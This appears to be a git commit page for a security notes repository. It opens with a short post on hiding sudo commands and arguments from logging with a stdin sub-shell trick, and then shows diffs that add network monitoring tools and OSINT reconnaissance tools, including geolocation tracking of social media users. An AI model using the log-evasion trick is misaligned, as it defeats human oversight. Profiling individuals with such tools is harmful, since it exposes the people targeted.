Don't want the user to see your sudo wrapper, a command, or specific argument? There are dozens of ways to avoid logging with escapes and sub-shells (mail, gdb, ash).
But what about creating a pipe of standard in?
$(< /dev/stdin)
<anything you want>
^D^D
How could you further hide the process with shell wrappers, aliases, symlinks, exec renames?
What I'm getting at here is, never underestimate the power of leveraging built-in tools in unintended ways.
The Mindset -
For me, this style of thinking is the true sense of "hacking." Learning about an environment or system until you understand what you can make it do, irrespective of what it was intended to do.
Next time you look at a system, environment, or command, ask yourself the following. Does it: create sockets, alter data, read files, elevate privileges, control the flow of data, alter appearances to a user or process, impact commands before or after execution, alter keyboard entry, import anything from anywhere... ? The list and impact is only limited by your creativity.
Enough soap-boxing, have a fun time in Las Vegas! Be safe.
Go learn something...
@ThemsonMester

+ 8
- 0
Draft/Network Security Monitoring & Logging.md View File

@ -20,6 +20,8 @@ Cull
##### To Do
* Create incident Response section
* Break out Threat hunting stuff
* Break out Logging stuff into "logging" for system specific logging
#### Cull
[laikaboss](https://github.com/lmco/laikaboss)
@ -30,6 +32,12 @@ http://www.netfort.com/wp-content/uploads/PDF/WhitePapers/NetFlow-Vs-Packet-Anal
[Response Operation Collections Kit Reference Build](https://github.com/rocknsm/rock)
[Stenographer](https://github.com/google/stenographer/blob/master/README.md)
* Stenographer is a full-packet-capture utility for buffering packets to disk for intrusion detection and incident response purposes. It provides a high-performance implementation of NIC-to-disk packet writing, handles deleting those files as disk fills up, and provides methods for reading back specific sets of packets quickly and easily.
[Netdude](http://netdude.sourceforge.net/)
* The Network Dump data Displayer and Editor is a framework for inspection, analysis and manipulation of tcpdump trace files. It addresses the need for a toolset that allows easy inspection, modification, and creation of pcap/tcpdump trace files. Netdude builds on any popular UNIX-like OS, such as Linux, the BSDs, or OSX.


+ 93
- 55
Draft/Open Source Intelligence.md View File

@ -21,6 +21,8 @@ http://toddington.com/resources/
www.osintinsight.com/shared.php?user=Mediaquest&folderid=0\
#### End cull
@ -84,7 +86,10 @@ www.osintinsight.com/shared.php?user=Mediaquest&folderid=0\
[How to Use Python to Spy on Your Friends: Web APIs, Recon ng, & OSINT](https://www.youtube.com/watch?v=BOjz7NfsLpA)
[ZOMG Its OSINT Heaven Tazz Tazz](https://www.youtube.com/watch?v=cLmEJLy7dv8)
[Practical OSINT - Shane MacDougall](https://www.youtube.com/watch?v=cLmEJLy7dv8)
* There’s more to life to OSINT than google scraping and social media harvesting. Learn some practical methods to automate information gathering, explore some of the most useful tools, and learn how to recognize valuable data when you see it. Not only will we explore various tools, attendees will get access to unpublished transforms they can use/modify for their own use.
@ -99,110 +104,143 @@ www.osintinsight.com/shared.php?user=Mediaquest&folderid=0\
Reference Site: http://osintinsight.com/shared.php?expand=169,175&folderid=0&user=Mediaquest
[TheHarvester](From: https://code.google.com/p/theharvester/)
* Description: The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database. This tool is intended to help Penetration testers in the early stages of the penetration test in order to understand the customer footprint on the Internet. It is also useful for anyone that wants to know what an attacker can see about their organization.
[Maltego](https://www.paterva.com/web6/products/maltego.php)
* Description: What you use to tie everything together.
[MetaGooFil](https://code.google.com/p/metagoofil/)
* Description: Metagoofil is an information gathering tool designed for extracting metadata of public documents (pdf,doc,xls,ppt,docx,pptx,xlsx) belonging to a target company. The tool will perform a search in Google to identify and download the documents to local disk and then will extract the metadata with different libraries like Hachoir, PdfMiner and others. With the results it will generate a report with usernames, software versions and servers or machine names that will help Penetration testers in the information gathering phase.
[Gitrob](
* [Blog post](http://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/)
* Gitrob is a command line tool that can help organizations and security professionals find such sensitive information. The tool will iterate over all public organization and member repositories and match filenames against a range of patterns for files that typically contain sensitive or dangerous information.
[PowerMeta](https://github.com/dafthack/PowerMeta)
* PowerMeta searches for publicly available files hosted on various websites for a particular domain by using specially crafted Google, and Bing searches. It then allows for the download of those files from the target domain. After retrieving the files, the metadata associated with them can be analyzed by PowerMeta. Some interesting things commonly found in metadata are usernames, domains, software titles, and computer names.
[Recon-ng](https://bitbucket.org/LaNMaSteR53/recon-ng)
* Description: Recon-ng is a full-featured Web Reconnaissance framework written in Python. Complete with independent modules, database interaction, built in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly.
[DataSploit](https://github.com/DataSploit/datasploit)
A tool to perform various OSINT techniques, aggregate all the raw data, and give data in multiple formats.
[OSINT Mantra](http://www.getmantra.com/hackery/osint.html)
[blacksheepwall](https://github.com/tomsteele/blacksheepwall)
* blacksheepwall is a hostname reconnaissance tool
[SearchDiggity](http://www.bishopfox.com/resources/tools/google-hacking-diggity/attack-tools/#searchdiggity)
* Description: SearchDiggity 3.1 is the primary attack tool of the Google Hacking Diggity Project. It is Bishop Fox’s MS Windows GUI application that serves as a front-end to the most recent versions of our Diggity tools: GoogleDiggity, BingDiggit, Bing LinkFromDomainDiggity, CodeSearchDiggity, DLPDiggity, FlashDiggity, MalwareDiggity, PortScanDiggity, SHODANDiggity, BingBinaryMalwareSearch, NotInMyBackYard Diggity
[Oryon C Portable](http://osintinsight.com/oryon.php)
* Oryon C Portable is a web browser designed to assist researchers in conducting Open Source Intelligence investigations. Oryon comes with dozens of pre-installed tools and a select set of links cataloged by category – including those that can be found in the OI Shared Resources.
[Maltego](https://www.paterva.com/web6/products/maltego.php)
* Description: What you use to tie everything together.
[Creepy.py](http://ilektrojohn.github.io/creepy/)
* Description: Creepy is a geolocation OSINT tool. Gathers geolocation related information from online sources, and allows for presentation on map, search filtering based on exact location and/or date, export in csv format or kml for further analysis in Google Maps.
[OpenRefine](https://github.com/OpenRefine/OpenRefine)
* Description: OpenRefine is a power tool that allows you to load data, understand it, clean it up, reconcile it to master database, and augment it with data coming from Freebase or other web sources. All with the comfort and privacy of your own computer.
[Metashield Analyzer](https://metashieldanalyzer.elevenpaths.com/)
* Description: Metadata documents can help a malicious user to obtain information that is beyond our control in an enterprise environment. Metashield Analyzer is an online service that allows easily check if your office documents contain metadata.
[Tinfoleak](http://vicenteaguileradiaz.com/tools/)
* tinfoleak is a simple Python script that allow to obtain:
..* basic information about a Twitter user (name, picture, location, followers, etc.)
..* devices and operating systems used by the Twitter user
..* applications and social networks used by the Twitter user
..* place and geolocation coordinates to generate a tracking map of locations visited
..* show user tweets in Google Earth!
..* download all pics from a Twitter user
..* hashtags used by the Twitter user and when are used (date and time)
..* user mentions by the the Twitter user and when are occurred (date and time)
..* topics used by the Twitter user
[Recon-ng](https://bitbucket.org/LaNMaSteR53/recon-ng)
* Description: Recon-ng is a full-featured Web Reconnaissance framework written in Python. Complete with independent modules, database interaction, built in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly.
[Creepy.py](http://ilektrojohn.github.io/creepy/)
* Description: Creepy is a geolocation OSINT tool. Gathers geolocation related information from online sources, and allows for presentation on map, search filtering based on exact location and/or date, export in csv format or kml for further analysis in Google Maps.
[OSINT OPSEC Tool](https://github.com/hyprwired/osint-opsec-tool)
* Description: The OSINT OPSEC Tool monitors multiple 21st Century OSINT sources real-time for keywords, then analyses the results, generates alerts, and maps trends of the data, finding all sorts of info people probably don't want others to see...